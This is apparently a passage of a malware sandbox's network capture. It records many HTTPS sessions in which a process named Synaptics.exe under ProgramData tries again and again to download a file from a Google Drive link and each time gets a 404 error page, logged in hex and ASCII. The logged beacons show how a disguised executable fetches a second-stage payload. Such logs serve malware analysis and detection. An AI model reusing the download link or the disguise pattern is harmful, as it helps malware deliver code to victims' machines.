                                                                                                                                                                                        2022-05-17 11:32:03 UTC785INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:03 UTC785INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        259192.168.2.350044142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC782OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC786INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-VuKNatGtJlgotaVSQ49X4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC787INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 59 76 37 4f 36 32 6d 47 6d 4a 64 36 65 6b 50 5a 6f 4e 58 4e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cYv7O62mGmJd6ekPZoNXNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:03 UTC789INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:03 UTC789INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        26192.168.2.349765142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:32 UTC78OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:32 UTC81INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:32 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fzMWW6/cevAE86pmft1aHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:32 UTC82INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 68 4e 73 58 4f 6f 6b 32 48 63 2f 35 71 46 7a 44 49 68 4e 51 64 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hNsXOok2Hc/5qFzDIhNQdw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:32 UTC84INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:32 UTC84INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        260192.168.2.350045142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC785OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC789INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TNmkdkLZRbGSdG5jWWRc1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC790INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:03 UTC790INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 61 53 58 73 51 73 43 34 2f 7a 2b 64 70 69 4b 49 6a 42 4d 57 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="naSXsQsC4/z+dpiKIjBMWw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:03 UTC791INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:04 UTC792INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        261192.168.2.350046142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC789OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC792INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-yFg6qvhttlCsQ096KditUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC793INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 32 36 5a 61 55 6d 4d 6a 6d 57 78 72 31 41 79 73 54 61 75 4d 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="126ZaUmMjmWxr1AysTauMA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:04 UTC795INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:04 UTC795INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        262192.168.2.350047142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:04 UTC792OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:04 UTC795INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:04 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-+b1Jm6qe75dPXnJjuj2EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:04 UTC796INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:04 UTC796INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 46 57 63 33 77 49 4f 74 56 51 56 55 64 69 66 47 43 76 31 56 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CFWc3wIOtVQVUdifGCv1Vg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:04 UTC798INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
